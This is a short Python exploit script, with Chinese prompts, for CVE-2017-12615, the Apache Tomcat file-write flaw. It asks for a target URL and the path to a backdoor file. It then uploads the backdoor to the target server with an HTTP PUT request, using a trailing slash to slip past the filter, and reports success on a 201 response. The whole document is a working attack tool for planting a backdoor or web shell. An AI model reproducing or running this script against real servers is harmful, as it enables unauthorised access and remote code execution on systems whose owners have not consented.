import sys import requests def title(): print("[-------------------------------------------------------------]") print("[-------------- Tomcat 文件写入漏洞 ---------------]") print("[-------- CVE-2017-12615 ----------]") print("[-------- use:python3 CVE-2017-12615.py --------]") print("[-------- Author:鸣蜩十四 ------------]") print("[-------------------------------------------------------------]") def main() : if (len(sys.argv)==1): url = input("请输入目标网站地址(http://ip:port/):") name = input("请为上传文件命名:") path = input("请输入后门的绝对地址:") poc(url,name,path) else : print("Example: n python3 " + sys.argv[0] + "n") def poc(url,name,path) : r = requests.put(url=url+name+'/',data=open(path, 'rb'),verify=False) if r.status_code == 201 : print("[+] 可能存在 Tomcat写入漏洞,请从网页查看是否上传成功") else : print("[-] 不存在该漏洞!") if __name__ == "__main__" : title() main()